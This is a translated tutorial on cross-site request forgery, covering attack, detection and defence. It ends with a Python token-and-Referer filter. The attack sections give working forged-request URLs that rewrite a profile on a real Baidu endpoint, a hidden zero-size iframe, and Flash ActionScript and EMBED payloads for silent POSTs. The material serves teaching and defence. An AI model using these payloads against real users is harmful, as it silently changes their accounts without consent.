CSRF-Attack and Defense

Source: Internet
Author: User
Tags: csrf attack

1. What is a CSRF attack?

CSRF is the abbreviation of Cross Site Request Forgery (also written XSRF): performing GET/POST operations against a CGI inside a user's session, operations the user may neither know about nor want. In effect it hijacks the HTTP session.
A website uses cookies to identify users. After a user authenticates successfully, the browser receives a cookie that identifies the user, and as long as the browser is not closed and the user has not logged out, that cookie is sent with every later request to the site. If the browser is made to request one of the site's URLs during that period, a function the user never intended to invoke (modifying personal data, say) may be executed. Because the request is not one the user really meant to send, it is called request forgery; and because such requests can also be submitted from a third-party website, the prefix is cross-site.
For example, on a BBS one can post an image whose URL points to the Logout link. After reading the post the user is logged out, because the browser fetched the Logout link with the user's identity: from the user's point of view there was merely a broken "image" in the post and no wish to log out, but the program assumes the user asked to log out and destroys the session. This is the legendary CSRF attack.
Don't underestimate CSRF. I remember L-Blog had a CSRF vulnerability (I did not know the concept at the time :P) that added an administrator with a link like this: http://localhost/L-blog/admincp.asp?action=Member&type=editmem&memid=2&memtype=supadmin; there was also the Google CSRF vulnerability [1], which led to email leakage. And do not assume that only XSS can breed worms: given the right conditions, CSRF can too.

2. Where do threats come from?

An image tag can only issue GET requests; in many cases we need to forge a POST request. One way is to use a cross-site scripting hole on the target site. Of course, the target site may not have such a hole, in which case we can launch the attack from a third-party website.
For example, if I want to attack a vulnerable blog, I would leave a comment on the target blog containing a website address to lure the owner into clicking it (how well this works depends on your powers of persuasion :P), and that page would contain an HTML form that submits the data.
Multi-window browsers make this easier.
The convenience of multi-window browsers (Firefox, Maxthon, MyIE, ...) also brings problems, because a new window opened in a multi-window browser shares all of the current sessions. That is: if I log on to my blog in IE and then start a second IE process to read the news, the sessions in the two IE windows are independent of each other, and a request sent to the blog from the second window carries no logon cookie. A multi-window browser, however, runs as a single process and all of its windows share the same sessions, so when a request to the blog is sent from the news window, the cookie from my blog logon goes with it.
Think about it: when we click a link someone else left in a blog, BBS or webmail, a well-prepared CSRF attack may be waiting for us.

3. Initiate a CSRF attack

To launch a CSRF attack with POST from a third-party site, the form is submitted automatically to the target CGI using JavaScript. Writing a form by hand every time is inconvenient; helper tools include the XSS POST Forwarder [2] and the CSRF Redirector [3], and I have written a corresponding ASP version [4]. To use it, you only need to pass it the submission URL and the parameters, and it automatically POSTs them to the target.
For example, to submit some data to www.0x54.org/a.asp: http://www.0x54.org/lake2/xss_post_forwarder.asp?lake2=http://www.0x54.org/a.asp&a=123&b=321&c=%26%23%25 (URL encoding has to be considered here).
In a real attack, however, you still have to think about how to get users onto our web page.

4. An example

Because CSRF is not as eye-catching as XSS, it is easy to find a web application with a CSRF hole. This time our target is Baidu, just for a test.
Whatever method you use, get a user who is logged on to Baidu to access this URL: http://www.0x54.org/lake2/xss_post_forwarder.asp?lake2=http://passport.baidu.com/ucommitbas&u_jump_url=&sex=1&email=CSRF@baidu.com&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=%C7%EB%D1%A1%D4%F1&bs1=%C7%EB%D1%A1%D4%F1&bs2=%CE%DE&txt_bs=&birth_site=%3B%3B&b%3Drs0=%C7%EB%D1%A1%D4%F1&rs1=%C7%EB%D1%A1%D4%F1&rs2=%CE%DE&txt_rs=&reside_site=%3B%3B
Then check whether that person's profile has been modified. One thing is a little depressing: when the person opens the URL, the browser ends up on the page saying the information was modified successfully, and we will be discovered. Is there a way to keep the browser from navigating there?
Yes.
One way is to build HTML with an iframe: <iframe width=0 height=0 src="http://www.0x54.org/lake2/xss_post_forwarder.asp?lake2=http://passport.baidu.com/ucommitbas&u_jump_url=&sex=1&email=CSRF@baidu.com&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=%C7%EB%D1%A1%D4%F1&bs1=%C7%EB%D1%A1%D4%F1&bs2=%CE%DE&txt_bs=&birth_site=%3B%3B&b%3Drs0=%C7%EB%D1%A1%D4%F1&rs1=%C7%EB%D1%A1%D4%F1&rs2=%CE%DE&txt_rs=&reside_site=%3B%3B"></iframe>
Another way is to use Flash.

5. CSRF With Flash

Flash can submit data to any URL. Open (a pirated copy of) Adobe Flash CS3 Professional, create a Flash file (ActionScript 3.0), right-click the default layer, choose Actions, and add the following code:

import flash.net.URLRequest;
import flash.net.URLVariables;
import flash.net.sendToURL;
import flash.system.Security;

// The URL the SWF will POST to
var url:URLRequest = new URLRequest("http://www.0x54.org/lake2");
// The form fields to send, here a single field a=lake2
var lake:URLVariables = new URLVariables("a=lake2");
url.method = "POST";
url.data = lake;
// Fire the request; the response is not read
sendToURL(url);
stop();

Export it as an SWF file, open it, and capture the traffic to see the effect: http://www.0x54.org/lake2/flash/test1.html
Writing ActionScript and compiling an SWF every time is tedious, so following the idea of the CSRF Redirector I wrote a similar Flash program [5] and then tried it against Baidu by visiting a web page containing this HTML: <EMBED src="http://www.0x54.org/lake2/flash/flash_hacking.swf?f=1&t=http://passport.baidu.com/ucommitbas&d=u_jump_url%3D%26sex%3D1%26email%3DCSRF@baidu.com%26sdv%3D%26zodiac%3D0%26birth_year%3D0%26birth_month%3D0%26birth_day%3D0%26blood%3D0%26bs0%3D%25C7%25EB%25D1%25A1%25D4%25F1%26bs1%3D%25C7%25EB%25D1%25A1%25D4%25F1%26bs2%3D%25CE%25DE%26txt_bs%3D%26birth_site%3D%253B%253B%26b%253Drs0%3D%25C7%25EB%25D1%25A1%25D4%25F1%26rs1%3D%25C7%25EB%25D1%25A1%25D4%25F1%26rs2%3D%25CE%25DE%26txt_rs%3D%26reside_site%3D%253B%253B"></EMBED> (again, pay attention to the second level of URL encoding).
Nor is sending requests all that can be done here: Flash can in fact read the returned content. If the response contains sensitive information, it can be read and sent to a web server under the attacker's control. Of course, this depends on whether the target site's cross-domain policy allows Flash to retrieve content across domains.

6. CSRF Detection

CSRF vulnerabilities are detected by hand: capture a normal request packet, remove the Referer field, and submit the packet again. If it is still accepted, there is basically a problem. Of course, the parameters may contain unpredictable values (a userid or the like); then it comes down to whether this unpredictable parameter can be obtained by other means, such as Flash. If it can, the problem still exists. Also try changing POST to GET, because some programs do not distinguish GET from POST.
Applications differ in their functions and response formats, so testing for CSRF automatically remains somewhat difficult. OWASP has a tool named CSRFTester for this [6].

7. Defense Against CSRF

On the web application side, CSRF is generally defended against with a Referer check, a token, or a verification code (CAPTCHA). Nexus's article [7] covers this thoroughly, and superhei has proposed a bypass idea [8]; please refer to their articles.
Another idea is to defend on the client: it seems a program similar to HttpWatch could be built that lets the browser intercept or filter cross-domain cookies.
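The following is an added example, not code from the original article, showing the server-side checks from section 7 combined in one request filter and how it behaves against the replayed packet from section 6 (no Referer) and against a GET substituted for POST. The host names blog.example and attacker.example, the session ids and the form fields are constructed for the demo.

```python
import hmac
import hashlib
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

SITE_HOST = "blog.example"               # assumed host of the protected application
SERVER_SECRET = secrets.token_bytes(32)  # per-deployment key; generated here for the demo


def issue_token(session_id: str) -> str:
    """Synchronizer token bound to the session; an HMAC, so the server stores nothing."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def source_host(headers: Dict[str, str]) -> Optional[str]:
    """Host named by Origin, else Referer, else None (what a replayed packet lacks)."""
    for name in ("Origin", "Referer"):
        if headers.get(name):
            return urlsplit(headers[name]).hostname
    return None


def check_request(method: str, headers: Dict[str, str], form: Dict[str, str],
                  session_id: str) -> Tuple[bool, str]:
    """Decide whether a state-changing request (a profile edit, say) may be honoured."""
    # 1. Only POST may change state, so a GET from an <img> or <iframe> src is refused.
    if method.upper() != "POST":
        return False, "state change via %s refused" % method
    # 2. Origin/Referer must name our own host. The replayed packet from the detection
    #    step carries neither header, so "no header" is refused rather than trusted.
    #    Privacy tools strip Referer, so this check is a backstop, not the main control.
    host = source_host(headers)
    if host != SITE_HOST:
        return False, "bad or missing source host: %r" % host
    # 3. The form must carry the token tied to this session. A third-party page or a
    #    Flash file cannot read our pages (absent a permissive cross-domain policy)
    #    to learn it, so a cross-site POST cannot supply it.
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), issue_token(session_id).encode()):
        return False, "csrf token missing or wrong"
    return True, "ok"


if __name__ == "__main__":
    sid = "session-123"                                   # constructed session id
    good = {"Referer": "http://blog.example/profile"}     # same-site request
    forged = {"Referer": "http://attacker.example/bait"}  # constructed third-party page
    print(check_request("POST", good, {"csrf_token": issue_token(sid)}, sid))  # (True, 'ok')
    print(check_request("POST", forged, {"email": "x@example.com"}, sid))      # refused
    print(check_request("GET", good, {"csrf_token": issue_token(sid)}, sid))   # refused
```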
